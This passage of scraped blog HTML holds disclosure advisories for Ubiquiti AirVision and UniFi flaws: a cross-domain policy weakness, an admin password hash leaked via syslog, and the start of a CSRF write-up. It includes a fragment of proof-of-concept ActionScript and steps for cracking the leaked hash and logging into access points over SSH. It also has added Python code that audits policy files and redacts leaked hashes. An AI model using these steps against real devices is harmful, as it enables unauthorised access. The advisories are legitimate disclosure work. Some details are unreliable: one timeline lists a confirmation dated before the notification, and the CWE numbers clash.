<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> sendLoader.load(sendRequest);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> } catch (error:Error) {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> trace("Error loading URL: " + error);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">}</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Solution:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater </span><span style="font-family: Arial; font-size: 13px; line-height: 1.15; white-space: pre-wrap;">(Note: the application was renamed from AirVision to UniFi Video)</span></div>
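The proof-of-concept SWFs above only work because the controller's crossdomain.xml lets any origin read its authenticated responses. The following is an added defender-side check, not Ubiquiti's code: it audits a Flash cross-domain policy for the grants that enable this, with a constructed weak policy beside a hardened one (the host name video.example.internal is a placeholder).

```python
"""Audit a Flash crossdomain.xml policy for over-permissive grants.

Added example for this advisory, not Ubiquiti's code. Both policies below are
constructed for illustration and are not the AirVision policy file; the host
name video.example.internal is a placeholder.
"""
import xml.etree.ElementTree as ET
from typing import List

# Weak policy: every origin may issue credentialed requests through Flash and
# read the responses, which is the condition the proof-of-concept relies on.
WEAK_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
  <allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
"""

# Hardened policy: one explicit origin, HTTPS-only, master policy file only.
HARDENED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only" />
  <allow-access-from domain="video.example.internal" secure="true" />
</cross-domain-policy>
"""


def audit_policy(xml_text: str) -> List[str]:
    """Return human-readable issues; an empty list means nothing was flagged."""
    issues: List[str] = []
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [f"unexpected root element {root.tag!r}"]

    site = root.find("site-control")
    if site is not None and site.get("permitted-cross-domain-policies") == "all":
        issues.append("site-control permits policy files anywhere on the host")

    for el in root.findall("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            issues.append('allow-access-from domain="*": any site may read '
                          "authenticated responses")
        elif domain.startswith("*."):
            issues.append(f"allow-access-from {domain!r}: every host under the "
                          "wildcard is trusted")
        # secure defaults to true for a policy served over HTTPS; an explicit
        # false lets HTTP-served content read HTTPS responses.
        if el.get("secure", "true").lower() == "false":
            issues.append(f'secure="false" for {domain!r}: HTTP-served content '
                          "may read HTTPS responses")

    for el in root.findall("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            issues.append('allow-http-request-headers-from domain="*": any site '
                          "may send custom request headers")
    return issues


if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, audit_policy(policy) or ["ok"])
```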
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Disclosure Timeline: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-25: Notified Ubiquiti of crossdomain vulnerability in AirVision product</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-19: Ubiquiti confirms receipt of AirVision report and existence of the vulnerability</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-28: </span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CVE-2014-2227 assigned</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-03-12: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-03-27: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-07: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-09: Ubiquiti provides timeline for solution</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-18: UniFi Video 3.0.1 is released</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-13: Set public disclosure date of 2014-07-24</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-07-24: Public disclosure</span></div>
Seth Art (http://www.blogger.com/profile/05253599496757968918), 2014-07-23: CVE-2014-2226 <span style="color: #4474a0; font-family: Calibri; font-size: 21px; line-height: 1.0791666666666666; white-space: pre-wrap;">Ubiquiti - UniFi Controller - Admin/root password hash sent via syslog</span><br />
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">CWE-310: </span><a href="http://cwe.mitre.org/data/definitions/310.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/310.html</span></a></div>
<br />
<b style="font-family: Calibri; font-size: 15px; line-height: 15px; white-space: pre-wrap;"><u>Misuse case:</u></b><span style="font-family: Calibri; font-size: 15px; line-height: 15px; white-space: pre-wrap;"> </span><br />
<br />
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 1; white-space: pre-wrap;">An attacker who has access to network traffic between the UniFi controller and the configured syslog server can retrieve the password hash and use it to access all managed access points, and potentially the UniFi controller as well. </span></span><br />
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 1; white-space: pre-wrap;"><br /></span></span>
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 1; white-space: pre-wrap;"><b><u>Details:</u></b> </span></span><br />
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 1; white-space: pre-wrap;"><br /></span></span>
<span style="font-family: Calibri; font-size: 15px; line-height: 15px; white-space: pre-wrap;">If remote logging is enabled on the UniFi controller, the controller sends syslog messages to the configured syslog server. Contained within the syslog messages is the admin password hash that is used by both the UniFi controller and all managed Access Points.</span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 15px; white-space: pre-wrap;">In the screenshot below, the auth key and the encrypted password are highlighted in yellow. </span></span><br />
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 15px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: Calibri; font-size: 15px; margin-left: 1em; margin-right: 1em; vertical-align: baseline; white-space: pre-wrap;"><img height="122px;" src="https://lh4.googleusercontent.com/0mbDkx7JP6QtDKphoCV8GUyOmvXsF727etC4W-ONes_XLUwRgOZ8z4TwYAdFUYAmWgJkgSe19uzavb6aoa2GlB-nv0iQHb4zFMjvUTd-G4iDQEVlxvxXenQyEvzC6TSnHZAXp3NgHl4" style="-webkit-transform: rotate(0rad); border: none;" width="624px;" /></span></div>
</div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;">The password is hashed with the legacy DES-based Unix crypt() scheme (John the Ripper identifies it as Traditional DES [128/128 BS SSE2]), and the plaintext can be recovered with John the Ripper:</span><br />
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="146px;" src="https://lh6.googleusercontent.com/F0H0WOrZ_DRZNbIT1kvkYDCSoAxG5T2WX0a1YFcXh8DVb3lOnIuAhtY9D-wZf0jBGjp5gMC5cpJf96IW6Fs2Bhg8fnWXaf8DlU0Gkd9zBRWjg1kxeoK09ngpRjKBX5UlFci68KmBmos" style="-webkit-transform: rotate(0rad); border: none;" width="617px;" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Note: The salt (and hash) changes each time the message is sent, but the password can always be recovered.</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Once you crack the password, you can log into any of the managed access points via SSH. This is the same format as the password hash that BusyBox stores: </span><br />
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="32px;" src="https://lh3.googleusercontent.com/1c5ZYUnNthS6UuX9kVTKh8WU-SSss6SjT8sJ5ZQiLDMHUXxDxkBv5t9fMr86n-cjGWOfzR8pQiRt8dlsA6VMBEo6acsMSVZICZlT-S5i99ed41raNUqYgOLXh_znLJW2Nx0tlh8Gnms" style="-webkit-transform: rotate(0rad); border: none;" width="508px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The CVE was assigned because there is no legitimate reason for sending the admin password hash in syslog messages. </span></div>
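Until the controller is upgraded, the practical defence is on the receiving side: a log pipeline that notices a crypt()-style hash or auth key in a message and masks it before the line is stored or forwarded. The following is an added example, not Ubiquiti's code; the sample syslog lines and the key names in them are constructed and do not reproduce the real controller message format.

```python
"""Detect and redact crypt(3)-style password hashes in syslog traffic.

Added example for this advisory, not Ubiquiti's code. The sample syslog
lines are constructed (key names included) and do not reproduce the real
controller message format.
"""
import re
from typing import List, NamedTuple, Set

# Traditional DES crypt(3) output: 13 characters from [./0-9A-Za-z],
# the first two of which are the salt.
DESCRYPT_RE = re.compile(r"[./0-9A-Za-z]{13}")
HEX32_RE = re.compile(r"[0-9a-fA-F]{32}")
# key=value tokens; the key name decides whether a value is credential-like,
# which keeps 13-character hostnames and similar noise from being flagged.
KV_RE = re.compile(r"([A-Za-z0-9_.]+)=(\S+)")
PASSWORD_KEYS = ("password", "passwd", "secret")
AUTHKEY_KEYS = ("authkey", "auth_key", "apikey")


class Finding(NamedTuple):
    line_no: int
    key: str
    kind: str    # "descrypt" or "hexkey"
    salt: str    # two-character salt for descrypt findings, else ""
    value: str


def classify(key: str, value: str) -> str:
    """Return "descrypt", "hexkey" or "" for one key=value token."""
    leaf = key.lower().rsplit(".", 1)[-1]
    if any(p in leaf for p in PASSWORD_KEYS) and DESCRYPT_RE.fullmatch(value):
        return "descrypt"
    if any(p in leaf for p in AUTHKEY_KEYS) and HEX32_RE.fullmatch(value):
        return "hexkey"
    return ""


def scan(lines: List[str]) -> List[Finding]:
    """Walk syslog lines and collect every credential-looking key=value."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, 1):
        for key, value in KV_RE.findall(line):
            kind = classify(key, value)
            if kind:
                salt = value[:2] if kind == "descrypt" else ""
                findings.append(Finding(n, key, kind, salt, value))
    return findings


def descrypt_salts(findings: List[Finding]) -> Set[str]:
    """Distinct salts seen; a fresh salt per message is what the advisory notes."""
    return {f.salt for f in findings if f.kind == "descrypt"}


def redact(line: str) -> str:
    """Mask credential values in place so the line can be forwarded or stored."""
    def mask(m: "re.Match[str]") -> str:
        key, value = m.group(1), m.group(2)
        kind = classify(key, value)
        if kind == "descrypt":
            # Keep the salt so rotations can still be correlated across messages.
            return f"{key}={value[:2]}<redacted-descrypt>"
        if kind == "hexkey":
            return f"{key}=<redacted-hexkey>"
        return m.group(0)
    return KV_RE.sub(mask, line)


# Constructed sample lines (not real controller output): two config pushes
# carrying the same password under different salts, plus a benign line whose
# 13-character hostname must not be flagged.
SAMPLE_SYSLOG = [
    "<14>Feb 16 10:01:02 unifi controller[1203]: ap 00:11:22:33:44:55 cfg "
    "users.1.password=ab3Fq9kLm2XcY mgmt.authkey=0123456789abcdef0123456789abcdef",
    "<14>Feb 16 10:05:17 unifi controller[1203]: ap 00:11:22:33:44:55 cfg "
    "users.1.password=zqT8nVw4RsK1p mgmt.authkey=0123456789abcdef0123456789abcdef",
    "<14>Feb 16 10:05:18 unifi controller[1203]: client 00:aa:bb:cc:dd:ee "
    "hostname=Controller123 assoc",
]

if __name__ == "__main__":
    found = scan(SAMPLE_SYSLOG)
    for f in found:
        print(f"line {f.line_no}: {f.kind} in {f.key} (salt={f.salt or '-'})")
    print("salts seen:", sorted(descrypt_salts(found)))
    for line in SAMPLE_SYSLOG:
        print(redact(line))
```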
<div>
<br />
Additional details:</div>
<div dir="ltr" style="margin-left: 0pt;">
<br /></div>
<div dir="ltr" style="margin-left: 0pt;">
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-94cb325f-655d-0ba2-9f85-584657caad66"><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">(CVE-2014-2226) - </span><span style="font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti Networks - UniFi Controller - Admin/root password hash sent via syslog</span></span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-94cb325f-655d-0ba2-9f85-584657caad66"><span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------</span></span></div>
<span id="docs-internal-guid-94cb325f-655d-0ba2-9f85-584657caad66">
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Vendor: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti Networks (http://www.ubnt.com/)</span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">----------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Affected Products/Versions: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">----------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">UniFi Controller v2.4.6</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Note: Previous versions may be affected</span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Description:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Title: Admin/</span><span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Root password hash sent in syslog messages</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CVE: CVE-2014-2226</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CWE: CWE-319: http://cwe.mitre.org/data/definitions/319.html</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Researcher: Seth Art - @sethsec</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Detailed writeup (includes screenshots): </span><a href="http://sethsec.blogspot.com/2014/07/cve-2014-2226.html" style="text-decoration: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://sethsec.blogspot.com/2014/07/cve-2014-2226.html</span></a><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">If remote logging is enabled on the UniFi controller, syslog messages are sent to a syslog server. Contained within the syslog messages is the admin password hash that is used by both the UniFi controller and all managed Access Points. This CVE was assigned because there is no legitimate reason for sending the admin password hash in syslog messages. </span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">POC:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Not Applicable. </span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Solution:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater</span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Disclosure Timeline: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-16: Notified Ubiquiti of vulnerabilities in UniFi and mFi products</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-17: Ubiquiti acknowledges and requests details</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-17: Report with POC sent to Ubiquiti</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-19: Asked Ubiquiti to confirm receipt of report</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-19: Ubiquiti confirms receipt of report and existence of the vulnerabilities</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-28: </span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CVE-2014-2226 assigned</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-03-12: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-03-27: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-07: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-09: Ubiquiti provides timeline for solution</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-05-30: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-12: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-12: UniFi 3.2.1 is released</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-13: Set public disclosure date of 2014-07-24</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-07-24: Public disclosure</span></div>
</span></div>
<div dir="ltr" style="margin-left: 0pt;">
<br /></div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-22574543550965345572014-07-23T23:35:00.001-04:002014-08-26T23:19:35.379-04:00CVE-2014-2225<span style="font-family: inherit;">This CVE covers three separate Ubiquiti Networks applications that are all vulnerable to CSRF:</span><br />
<ul>
<li><span style="font-family: inherit;">UniFi Controller</span></li>
<li><span style="font-family: inherit;">mFi Controller</span></li>
<li><span style="font-family: inherit;">AirVision Controller</span></li>
</ul>
<div>
<h1 dir="ltr" style="line-height: 1.0791; margin-bottom: 0pt; margin-top: 12pt;">
<span style="color: #4474a0; font-family: Calibri; font-size: 21px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="line-height: 1.0791;">Ubiquiti - UniFi Controller v2.4.6 - </span>Cross-site Request Forgery (CSRF)</span></h1>
</div>
<div>
<br /></div>
<div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">CWE-352: </span><a href="http://cwe.mitre.org/data/definitions/352.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/352.html</span></a></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
